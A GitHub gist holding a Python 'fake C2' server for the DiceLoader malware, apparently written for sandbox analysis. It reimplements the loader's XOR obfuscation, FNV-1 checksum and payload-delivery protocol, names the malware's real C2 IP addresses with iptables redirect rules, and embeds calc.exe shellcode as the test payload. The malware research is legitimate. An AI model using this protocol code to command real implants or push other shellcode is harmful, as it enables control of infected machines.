Created
January 26, 2024 08:06
-
-
Save lbpierre/a2ec27e172b9345fcfde6eddd7877f64 to your computer and use it in GitHub Desktop.
DiceLoader fake C2, usage: `python3 tcp_server.py -v --host 0.0.0.0 --port 8080`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
import time | |
import struct | |
import logging | |
import socket | |
import select | |
import argparse | |
import platform | |
from itertools import zip_longest | |
from enum import Enum | |
from binascii import unhexlify | |
from typing import Dict, Any, Optional, Union, List, Tuple, Callable, Iterator | |
Action = Enum("Action", ["RECV", "SEND"]) | |
# Add this IP tables to redirect VM traffic to C2 Ip to a local IP | |
# 62.76.234.234 and 194.87.82.181 are the C2 obfuscated in the PE. | |
# replace the interface (virb0) and port regarding your setup | |
# iptables -t nat -A PREROUTING -i virbr0 -p tcp -m tcp -d 62.76.234.234 --dport 443 -j DNAT --to-destination 127.0.0.1:8080 | |
# iptables -t nat -A PREROUTING -i virbr0 -p tcp -m tcp -d 194.87.82.181 --dport 443 -j DNAT --to-destination 127.0.0.1:8080 | |
# Enable route localnet: sysctl -w net.ipv4.conf.all.route_localnet=1 | |
# From shell-storm: | |
# https://shell-storm.org/shellcode/files/shellcode-567.html | |
# /* | |
# Author: SkuLL-HacKeR | |
# Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco | |
# H0ME : Geeksec.com & No-exploiT | |
# Email : My@Hotmail.iT & Wizard-skh@hotmail.com | |
# // Win32 Shellcode Collection (calc) 19 bytes | |
# // Shellcode Exec Calc.exe | |
# // Tested on XP SP2 FR | |
# #include "stdio.h" | |
# unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" | |
# "\xBF\x77\xFF\xD2\xCC" | |
# "\xE8\xF3\xFF\xFF\xFF" | |
# "\x63\x61\x6C\x63"; | |
# int main () | |
# { | |
# int *ret; | |
# ret=(int *)&ret+2; | |
# printf("Shellcode Length is : %d\n",strlen(shellcode)); | |
# (*ret)=(int)shellcode; | |
# return 0; | |
# } | |
calc_exe = ( | |
b"\x01\xeB\x02\xBA\xC7\x93\xBF\x77\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x61\x6C\x63" | |
) | |
# backup sequence: useful if you want to set | |
# a breakpoint on each recv / send function (fromm WS2_32 DLL) | |
# self.sequence: Iterator[Tuple[Action, Callable]] = iter([ | |
# (Action.RECV, lambda _: [b""]), # 2 random byte | |
# (Action.RECV, lambda _: [b""]), # 10 generated random bytes | |
# (Action.RECV, lambda _: [b""]), # 22 bytes (fingerprint xor) | |
# (Action.RECV, lambda _: [b""]), # 19 bytes local ip addr | |
# # (Action.RECV, lambda _: [b""]), # received 4 bytes that are the fnv1 hash of the previous message | |
# # (Action.RECV, lambda _: [b""]), # 4 byte of fnv1 control | |
# # (Action.SEND, lambda _: [struct.pack('<h', 0xfd), struct.pack('<hhhh', 0x90, 0x90, 0x90, 0x90)]), # breaking loop | |
# # (Action.SEND, lambda _: [struct.pack('<h', 0xff), b"\x90" * 0xff]), # len of next data | |
# # (Action.SEND, lambda _: [b"\x90" * 0xff]), # data | |
# (Action.SEND, lambda _: [struct.pack('<B', 0x1), | |
# struct.pack('<B', 0xa), | |
# self.temp_xor_key, | |
# struct.pack('<L', 0x1000), | |
# self.xored_payload, | |
# struct.pack('<L', self.fnv1(self.xored_payload))]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [struct.pack('>b', 0xf)]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# (Action.RECV, lambda _: [b""]), | |
# ]) | |
class DiceLoader: | |
def __init__(self): | |
self.xor_key: bytes = unhexlify( | |
"CD4E15AAAE079838B0FDC60FA99AD13EC4B2A9B0D8EF07E28BA87EFE3CA488" | |
) | |
self.temp_xor_key: bytes = struct.pack( | |
">QL3s", 0xDDDDDDDDAAAAAAAA, 0xBBBB, b"ccc" | |
) | |
self.payload: bytes = calc_exe + b"\x90" * (4096 - len(calc_exe)) | |
self.xored_payload: bytes = self.xor_blob( | |
self.xor_blob(self.payload, self.xor_key), self.temp_xor_key | |
) | |
self.sequence: Iterator[Tuple[Action, Callable]] = iter( | |
[ | |
( | |
Action.SEND, | |
lambda _: [ | |
struct.pack("<B", 0x1), | |
struct.pack("<B", 0xA), | |
self.temp_xor_key, | |
struct.pack("<L", 0x1000), | |
self.xored_payload, | |
struct.pack("<L", self.fnv1(self.xored_payload)), | |
], | |
), | |
# (Action.RECV, lambda _: [struct.pack('>b', 0xf)]), | |
(Action.RECV, lambda _: [b""]), | |
(Action.RECV, lambda _: [b""]), | |
(Action.RECV, lambda _: [struct.pack(">b", 0xF)]), | |
] | |
) | |
def __next__(self): | |
return next(self.sequence) | |
def fnv1(self, data: bytes) -> int: | |
"""Fowler–Noll–V 1 hash used by DiceLoader""" | |
output = 0 | |
# logging.debug(f"Input data: `{data}`") | |
for char in data: | |
output = 0x1000193 * (char ^ output) | |
output &= 0x00000000FFFFFFFF | |
# logging.debug(f"Expected ouput: `0x{output:x}`") | |
return output | |
def xor_blob(self, blob: bytes, key: bytes) -> bytearray: | |
"""DiceLoader uses XOR obfuscation""" | |
output = bytearray() | |
temp = blob[0] ^ key[0] | |
output.append(temp) | |
for index, value in enumerate(blob): | |
if index == 0: | |
continue | |
temp = blob[index - 1] ^ value ^ key[index % len(key)] | |
output.append(temp) | |
return output | |
diceloader_state_machine = DiceLoader() | |
def grouper(iterable, n, fillvalue=None) -> zip_longest: | |
"""helper for the hexdump""" | |
args = [iter(iterable)] * n | |
return zip_longest(*args, fillvalue=fillvalue) | |
class ColoredFormatter(logging.Formatter): | |
COLORS = { | |
"INFO": "\033[1;32m[+]\033[0m", # Green | |
"WARNING": "\033[1;33m[!]\033[0m", # Orange/Yellow | |
"ERROR": "\033[1;31m[-]\033[0m", # Red | |
"DEBUG": "\033[1;34m[*]\033[0m", # Blue | |
} | |
def format(self, record: logging.LogRecord) -> str: | |
""" | |
Format the log record with colored output. | |
Args: | |
record (logging.LogRecord): The log record. | |
Returns: | |
str: The formatted log message. | |
""" | |
log_message = super().format(record) | |
log_level_color = self.COLORS.get(record.levelname, "") | |
level = record.levelname | |
return f"{log_level_color} {level} : {log_message}" | |
def setup_custom_logger(verbose: bool = False) -> None: | |
""" | |
Configure a custom logger with colored output. | |
Returns: | |
None | |
""" | |
logger = logging.getLogger() | |
if verbose: | |
logger.setLevel(logging.DEBUG) | |
else: | |
logger.setLevel(logging.INFO) | |
# Console Handler | |
console_handler = logging.StreamHandler(sys.stdout) | |
console_handler.setLevel(logging.DEBUG) | |
# Formatter | |
formatter = ColoredFormatter("%(message)s") | |
console_handler.setFormatter(formatter) | |
# Add handler to logger | |
logger.addHandler(console_handler) | |
def colorize_char(char: int) -> str: | |
""" | |
Add color to each character. | |
Args: | |
char (str): The character. | |
Returns: | |
str: The colorized character. | |
""" | |
if 0x20 <= char <= 0x7E: | |
return f"\033[1;31m{chr(char)}\033[0m" # Red color for printable characters | |
else: | |
return "." # No color for non-printable characters | |
def hexdump_bytes(data: bytes) -> None: | |
""" | |
Log the input bytes in hexdump format with a specified interval using logging.debug. | |
Args: | |
data (bytes): The input bytes. | |
""" | |
offset = "Offset" | |
index_format = " ".join([f"{x:02x}" for x in range(16)]) | |
logging.debug(f"{offset:>8} | {index_format} | String ") | |
logging.debug(f"{'-' * 92}") | |
for line_offset, chunk in enumerate(grouper(data, 16)): | |
line_hex: List[str] = [] | |
line_chars: List[str] = [] | |
for _byte in chunk: | |
if _byte is not None: | |
line_hex.append(f"{_byte:02x}") | |
line_chars.append(colorize_char(_byte)) | |
else: | |
line_hex.append(" ") | |
line_chars.append(" ") | |
logging.debug( | |
f"{line_offset * 16 :#8x} | {' '.join(line_hex)} | {' '.join(line_chars)}" | |
) | |
def create_epoll() -> Optional[Union[select.epoll, None]]: | |
""" | |
Create an epoll object if not on Windows. | |
Returns: | |
Optional[Union[select.epoll, None]]: The epoll object or None if on Windows. | |
""" | |
if platform.system() == "Windows": | |
return None | |
else: | |
return select.epoll() | |
def create_server_socket(host: str, port: int) -> socket.socket: | |
""" | |
Create a TCP server socket. | |
Args: | |
host (str): The host IP address. | |
port (int): The port number. | |
Returns: | |
socket.socket: The created server socket. | |
""" | |
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
server_socket.bind((host, port)) | |
server_socket.listen(5) | |
server_socket.setblocking(False) | |
return server_socket | |
def handle_new_connection( | |
epoll: select.epoll, | |
server_socket: socket.socket, | |
connections: Dict[int, socket.socket], | |
requests: Dict[int, bytes], | |
responses: Dict[int, bytes], | |
) -> None: | |
""" | |
Handle a new client connection. | |
Args: | |
epoll (select.epoll): The epoll instance. | |
server_socket (socket.socket): The server socket. | |
connections (Dict[int, socket.socket]): Dictionary of client connections. | |
requests (Dict[int, bytes]): Dictionary of incoming data from clients. | |
responses (Dict[int, bytes]): Dictionary of outgoing data to clients. | |
""" | |
client_socket, _ = server_socket.accept() | |
client_socket.setblocking(False) | |
epoll.register(client_socket.fileno(), select.EPOLLIN) | |
connections[client_socket.fileno()] = client_socket | |
requests[client_socket.fileno()] = b"" | |
responses[client_socket.fileno()] = b"" | |
def handle_incoming_data( | |
fileno: int, | |
epoll: select.epoll, | |
connections: Dict[int, socket.socket], | |
requests: Dict[int, bytes], | |
responses: Dict[int, bytes], | |
) -> None: | |
""" | |
Handle incoming data from a client. | |
Args: | |
fileno (int): The file descriptor of the client socket. | |
epoll (select.epoll): The epoll instance. | |
connections (Dict[int, socket.socket]): Dictionary of client connections. | |
requests (Dict[int, bytes]): Dictionary of incoming data from clients. | |
responses (Dict[int, bytes]): Dictionary of outgoing data to clients. | |
""" | |
try: | |
data = connections[fileno].recv(1024) | |
except ConnectionResetError: | |
logging.warning("Connection reset by peer") | |
epoll.unregister(fileno) | |
connections[fileno].close() | |
del connections[fileno] | |
del requests[fileno] | |
del responses[fileno] | |
return None | |
else: | |
if not data: | |
epoll.unregister(fileno) | |
connections[fileno].close() | |
del connections[fileno] | |
del requests[fileno] | |
del responses[fileno] | |
return None | |
requests[fileno] += data | |
epoll.modify(fileno, select.EPOLLOUT) | |
logging.info(f"received \033[34m{len(data)}\033[0m bytes") | |
hexdump_bytes(data) | |
def handle_outgoing_data( | |
fileno: int, | |
epoll: select.epoll, | |
connections: Dict[int, socket.socket], | |
requests: Dict[int, bytes], | |
) -> None: | |
""" | |
Handle outgoing data to a client. | |
MODIFY ME to handle the server | |
Args: | |
fileno (int): The file descriptor of the client socket. | |
epoll (select.epoll): The epoll instance. | |
connections (Dict[int, socket.socket]): Dictionary of client connections. | |
requests (Dict[int, bytes]): Dictionary of incoming data from clients. | |
tips: requests.get(fileno, b"") <- get the request | |
""" | |
try: | |
sock = connections[fileno] | |
_, data = next(diceloader_state_machine) | |
outgoing_datas = data(requests.get(fileno, b"")) | |
for outgoing_data in outgoing_datas: | |
if outgoing_data == b"": | |
# usefull when no data is required to be responded... | |
sent = sock.send(outgoing_data) | |
requests[fileno] = outgoing_data[sent:] | |
epoll.modify(fileno, select.EPOLLIN) | |
return | |
sent = sock.send(outgoing_data) | |
if sent == 0: | |
logging.warning( | |
f"Connection closed by remote peer: {sock.getpeername()}" | |
) | |
epoll.unregister(fileno) | |
sock.close() | |
del connections[fileno] | |
else: | |
requests[fileno] = outgoing_data[sent:] | |
epoll.modify(fileno, select.EPOLLIN) | |
logging.info( | |
f"\033[1;32mSent\033[0m to {fileno}, \033[31m{len(outgoing_data)}\033[0m byte(s)" | |
) | |
hexdump_bytes(outgoing_data) | |
except (ConnectionResetError, BrokenPipeError): | |
logging.warning(f"Connection reset by remote peer") | |
epoll.unregister(fileno) | |
sock.close() | |
del connections[fileno] | |
def main(host: str = "127.0.0.1", port: int = 8080): | |
""" | |
Main function to run the epoll-based TCP server. | |
""" | |
server_socket = create_server_socket(host, port) | |
logging.info(f"Server starts {host}:{port}") | |
epoll: Any = create_epoll() | |
if epoll: | |
epoll.register(server_socket.fileno(), select.EPOLLIN) | |
connections = {} | |
requests = {} | |
responses = {} | |
last_modified = os.path.getmtime(__file__) | |
try: | |
while True: | |
current_modified = os.path.getmtime(__file__) | |
if current_modified > last_modified: | |
logging.info("Script modified. Reloading...") | |
os.execv(sys.executable, ["python"] + sys.argv) | |
last_modified = current_modified | |
events: Any = epoll.poll() | |
for fileno, event in events: | |
if fileno == server_socket.fileno(): | |
handle_new_connection( | |
epoll, server_socket, connections, requests, responses | |
) | |
elif event & select.EPOLLIN: | |
handle_incoming_data( | |
fileno, epoll, connections, requests, responses | |
) | |
elif event & select.EPOLLOUT: | |
handle_outgoing_data(fileno, epoll, connections, requests) | |
elif event & select.EPOLLHUP: | |
epoll.unregister(fileno) | |
connections[fileno].close() | |
del connections[fileno] | |
del requests[fileno] | |
del responses[fileno] | |
logging.info(f"Connection closed: {fileno}") | |
time.sleep(0.1) # Sleep for a short duration to avoid high CPU usage | |
except KeyboardInterrupt: | |
logging.info("Server interrupted by user.") | |
finally: | |
if epoll: | |
epoll.unregister(server_socket.fileno()) | |
epoll.close() | |
server_socket.close() | |
logging.info("Server shutdown.") | |
if __name__ == "__main__": | |
parser = argparse.ArgumentParser(description="Raw TCP server") | |
parser.add_argument( | |
"-v", | |
"--verbose", | |
action="store_true", | |
help="Enable verbose logging (DEBUG level)", | |
) | |
parser.add_argument( | |
"--host", type=str, help="Specify the host", default="127.0.0.1" | |
) | |
parser.add_argument("--port", type=int, help="Specify the port", default=8080) | |
args = parser.parse_args() | |
setup_custom_logger(args.verbose) | |
main(args.host, args.port) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment